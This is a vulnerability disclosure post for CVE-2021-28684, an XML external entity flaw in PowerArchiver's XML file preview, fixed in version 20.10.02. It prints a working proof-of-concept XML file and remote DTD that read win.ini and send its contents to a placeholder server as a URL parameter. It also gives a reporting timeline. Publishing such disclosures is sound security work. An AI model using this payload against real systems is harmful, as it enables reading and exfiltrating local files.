CVE-2021-28684: XXE vulnerability in PowerArchiver <= 20.00.73

Posted on Jun 4, 2021

Parser used for previews of XML files in PowerArchiver <= 20.00.73 allows processing of external entities, which might lead to unauthorized access to local resources. Minimal user interaction is required when conducting the attack, as user only has to select the XML file in order for the preview to load.

PoC:

<?xml version="1.0" ?> 
<!DOCTYPE r [ 
<!ELEMENT r ANY > 
<!ENTITY % sp SYSTEM "http://example.com/test.dtd"> 
%sp; 
%param1; 
%exfil; 
]> 

Content of test.dtd:

<!ENTITY % data SYSTEM "file:///c:/windows/win.ini"> 
<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM 'http://example.com/?%data;'>">

Once the file is previewed, application makes two requests to the remote server. First, it attempts to download the test.dtd file and once entities included in it are loaded, it discloses content of the file specified (win.ini in this PoC) via a URL parameter in the next request to the server.

Requests produced by PowerArchiver when previewing a malicious file displayed in Burp Collaborator

Vulnerability has been fixed in version 20.10.02.

Timeline:

03/12/2021 – vulnerability reported to the vendor
03/18/2021 – CVE requested, assigned CVE-2021-28684
04/19/2021 – vulnerability fixed in PowerArchiver 20.10.02 [PA-2886]
06/21/2021 – CVE-2021-28684 updated with details and published